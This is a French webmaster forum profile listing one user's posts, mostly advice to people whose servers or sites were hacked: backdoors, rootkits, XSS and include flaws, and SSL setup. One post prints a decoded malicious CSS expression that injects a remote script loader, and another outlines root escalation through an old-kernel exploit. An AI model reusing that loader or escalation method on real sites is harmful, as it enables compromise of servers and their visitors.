Aller au contenu

Meschac

Actif
  • Compteur de contenus

    37
  • Inscrit(e) le

  • Dernière visite

Tout ce qui a été posté par Meschac

  1. Merci beaucoup pour ta réponse je vais lire cet article
  2. Bonjour,j'ai une question, Comment faire pour interagir dans un formulaire web php sans "reloader" la page ?? L'interaction se porte sur la mise à jour d'une rubrique par rapport au changement d'une autre : ex: si je met un numéro de département j'ai la liste des villes de ce département ( Voir http://www.degrouptest.com/) Merci d'avance de votre réponse,j'espère que j'ai été clair
  3. Salut,si tu as des connaissances en serveur dédié tu peu également voir pour prendre une dédibox,tu as un espace de sauvegarde FTP de 5 Go inclus. Si cela ne suffit pas tu peu prendre une option et tu aura droit à 200 Go.
  4. Salut,je viens de faire une petite recherche sur ta faille pour roundcube. Il y en as 2,une Xss et une exécution de code php. Si tu n'a plus d'accès ssh je suppose que la personne à utiliser la deuxième méthode pour pénétré ton serveur. Elle réussi à rentré dans ton serveur et met une backdoor. Pour être root ensuite,il y a plusieurs méthode,la plus simple est : -un vieux kernel Tu cherche une faille sur le kernel en question,tu le compile et t'es root Le truc c'est que si c'est le hackeur qui à fermé ton accés root,lui il doit bien accéder a la machine par autre part,si tu as un accès FTP essaye de voir si tu trouve pas des fichiers php avec des noms bizarre... Sinon il reste la solution à Dan.
  5. Tu es sous quelle distribution ???
  6. Salut,pour le port c'est sous apache que tu configure ça : Si tu es sous Debian c'est le fichier : /etc/apache2/ports.conf Tu met : Listen 1234 Et un petit restart: etc/init.d/apache2 restart Cette manipulation marche sous Debian Etch. MeScHaC
  7. Les nouveaux rootkits cache leur processus ou prenne des noms de processus qui n'éveille pas les soupçons donc tu n'y verra que du feu... Par contre en effet un trafic important en sortie non justifiés peu être une piste. Essaye de voir si tu n'as pas des fichiers de grosse taille qui ont été uploader à ton insu. Tu peu également regarder les dates de modification de tes fichiers php.Si tu peu réupload tout tes fichiers php depuis ton PC car il est possible que le hackeur est mis une backdoor dans un de tes fichiers php. Cordialement MeScHaC.
  8. Salut aodot Je voulais savoir si ton site utilise un formulaire d'upload par hasard ou quelques chose dans le style.Parce que avant d'installer un rootkit sur une machine il faut au préalable l'uploader sur le serveur. Donc soit tu as une faille qui permet de retrouver le login et mot de passe via par exemple un fichier config.php ou une sql injection qui permettrais la création d'un utilisateur admin ou l'affichage de ton mot de passe en md5 pour un forum par exemple. Il se peu également que tu sois victime d'une attaque bruteforce via ssh mais j'en doute car ovh t'aurais prévenu. D'après moi ou comme te l'a également dis Dan le problème se trouve dans un formulaire... MeScHaC
  9. Salut Calimero, en effet je trouve également cela étrange que ton propre hébergeur te demande ton mot de passe pour faire des tests et cela par mail je suppose ? Peu être du phishing ? Avec ce qui se passe sur le net en se moment tu as raison d'être inquiet en rapport a cette question. D'après moi un hébergeur ne demande pas tes mots de passe... A voir
  10. Ils sont vraiment de plus en plus vicieux Très bon a savoir en tout cas.Merci pour ce post intéressant Et par hazard tu ne sais pas comment les frames se sont mis dans ton forum ? Ce n'était pas la dernière version à jours ?
  11. Je suis totalement d'accord avec Portekoi.Beaucoup de site son piraté car ils ont des failles dans leur code. Meschac
  12. Si tu as ton propre serveur,il faut que tu vois avec openssl (sur du linux). Après si tu veux avoir un certificat valide il faudra que tu le fasse valider par une autorité de certification, ce qui est payant
  13. Salut,si tu veux implémenter le protocole SSL et donc avoir un certificat qui sera délivrer au client et donc par celui-ci mettre en place le protocole HTTPS il faut comme te le l'as dit Dadou voir avec ton hébergeur. Il faut également savoir que HTTPS permet de sécurisé seulement la connexion entre un ordinateur et ton serveur web.Les données transmises sont alors cryptée. Si l'ordinateur qui se connecte a ton serveur web via HTTPS est infecté la connexion SSL ne sert a rien. A mon avis le HTTPS ne sert seulement quand il y as des données sensibles a transférer d'un serveur web a un ordinateur. MeScHaC
  14. Tu as un antivirus sur ton serveur ou un anti-rootkit ? Tu atttend voir si les fichiers reviennent et s'il revienne tu nous montre le source des pages bizarres... Essaye de voir si tu ne trouve pas sur ton serveur des fichiers php qui ne sont pas les tiens ou qui on une taille assez importante...
  15. Quand je fait un URLDecode de ton Css je trouve ça : body { margin-top: expression(eval(unescape('if (!doc ument.getElement%4 2yId('JSSS')){ JS% 531 = 54; JSS2 = 1 59806; JSS3 = '/%7 3cadmin/cms/image% 73/isabif/dummy.ht m'; var js = doc%7 5ment.createEleme% 6Et('script'); js. setAttribute('sr%6 3', '/scadmin/cms% 2Fimages/isabif/ch eck.js'); js.set%4 1ttribute('id', '% 4ASSS'); document. getElementsByTag%4 Eame('head').item% 280).appendChild(j s) }; '))) } Je voudrais bien savoir ce qu'il y as dans la page "isabif/dummy.htm"
  16. Salut,je me permet de te renvoyer vers un autre sujet du même type je le pense : http://www.webmaster-hub.com/index.php?showtopic=40057 Comme vous êtes deux a avoir le même problème je pense a un vers qui se propagerais via une faille linux...? C'est très bizarre tout de même
  17. Je n'ai pas la solution mais tu devrais peu être essayer de migrer vers la dernière version de wamp.
  18. Tu utilise wamp ou easyphp ou autre ?
  19. Meschac

    Quel linux ?

    Salut,tout d'abord si tu souhaite avoir un serveur Linux il faut normalement oublier l'interface graphique. Une interface graphique sur un serveur ne sert a rien a part bouffer des ressources. Je te conseillerais la distribution debian qui est très stable et sécurisée et si tu souhaite avoir un aspect visuel tu peu y ajouter Webmin afin d'avoir une interface graphique via un navigateur web. Pour ton serveur FTP tu pourra utiliser ProFtpd couplé éventuellement a une base de donnée mysql qui te permettra une gestion simple des login & password. Après comme te l'as dis Dadou, la distribution ubuntu est très stable également (elle est basée sur Debian) et te permettra d'avoir une interface graphique.
  20. Salut,je pense également pareil que Dan. Essaye de nous mettre le code source de ton fichier "check.js " voir ce qu'il si passe... MeScHaC
  21. Salut francoisch, tout d'abord si tu as eu des soucis avec perl c'est que l'intrus a du utiliser une backdoor en perl afin de pouvoir se connecter a ton serveur. Après quand tu as un accès shell a un serveur tu peu par exemple si le noyau n'est pas a jour uploader un exploit qui te permettra devenir root. En ce qui concerne ton cas je pense que ta variable Get "Répertoire" n'est pas correctement filtrée. Tu dis que tu as modifier déjà le filtrage et donc tu as pu avoir auparavant une faille de type include ce qui aurait pu permettre a un intrus de pourvoir par exemple uploader une backdoor ou lire simplement ton fichier config.php etc... Par contre ta variable répertoire n'est pas correctement filtrer pour les XSS. Si tu le désire je peu te montrer comment on voie si c'est faillible ou pas via MP biensur Pour les failles XSS je te conseille d'utiliser la fonction htmlentities() pour filtrer tes variables... J'espère t'avoir aider,si tu ne comprend pas quelque chose n'hésite pas. Cordialement MeScHaC
  22. Je me permet de faire une petite analyse et te dire ça d'ici peu de temps
×
×
  • Créer...